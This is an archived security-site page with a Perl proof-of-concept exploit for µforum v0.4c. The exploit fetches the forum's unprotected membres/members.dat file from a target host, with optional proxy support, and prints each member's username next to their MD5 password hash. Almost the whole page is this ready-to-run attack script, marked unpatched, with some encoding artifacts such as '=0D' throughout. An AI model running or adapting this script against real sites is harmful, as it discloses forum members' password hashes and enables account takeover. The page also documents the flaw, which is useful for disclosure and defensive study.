TUCoPS :: Web BBS :: etc :: b06-4537.htm

forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc
forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc
forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc



#!/usr/bin/perl=0D
#=0D
# Affected.scr..: =B5forum v0.4c=0D
# Poc.ID........: 08060901=0D
# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file=0D
# Risk.level....: Medium=0D
# Vendor.Status.: Unpatched=0D
# Src.download..: comscripts.com/scripts/php.forum.1568.html=0D
# Poc.link......: acid-root.new.fr/poc/08060901.txt=0D
# Credits.......: DarkFig=0D
#=0D
use LWP::UserAgent;=0D
use HTTP::Request;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
print STDOUT "\n+", '-' x 36, "+\n";=0D
print STDOUT "| =B5forum v0.4c (members.dat) Exploit |\n";=0D
print STDOUT '+', '-' x 36, "+\n";=0D
=0D
my($host,$path,$proxh,$proxu,$proxp);=0D
my $opt = GetOptions(=0D
   'host=s'   =>  \$host,=0D
   'path=s'   =>  \$path,=0D
   'proxh=s'  =>  \$proxh,=0D
   'proxu=s'  =>  \$proxu,=0D
   'proxp=s'  =>  \$proxp);=0D
=0D
if(!$path) {$path = '/';}=0D
$host .= $path.'membres/members.dat';=0D
if($host !~ /http/) {$host = 'http://'.$host;}=0D 
=0D
my $ua = LWP::UserAgent->new();=0D
   $ua->agent('Mozilla');=0D
   $ua->timeout(30);=0D
   $ua->proxy(['http'] => $proxh) if $proxh;=0D
=0D
my $req = HTTP::Request->new('GET', $host);=0D
   $req->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
=0D
my $res = $ua->request($req);=0D
my $dat = $res->content;=0D
my @tabl= split(/:/, $dat);=0D
=0D
foreach (@tabl) {=0D
      if($_ =~ /"(.*)";a/){=0D
            print "\n".$1.'::';}=0D
=0D
      if($_ =~ /"([a-z0-9]{32})";i/){=0D
            print $1;}=0D
}=0D
=0D
print "\n";=0D
exit(0);

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH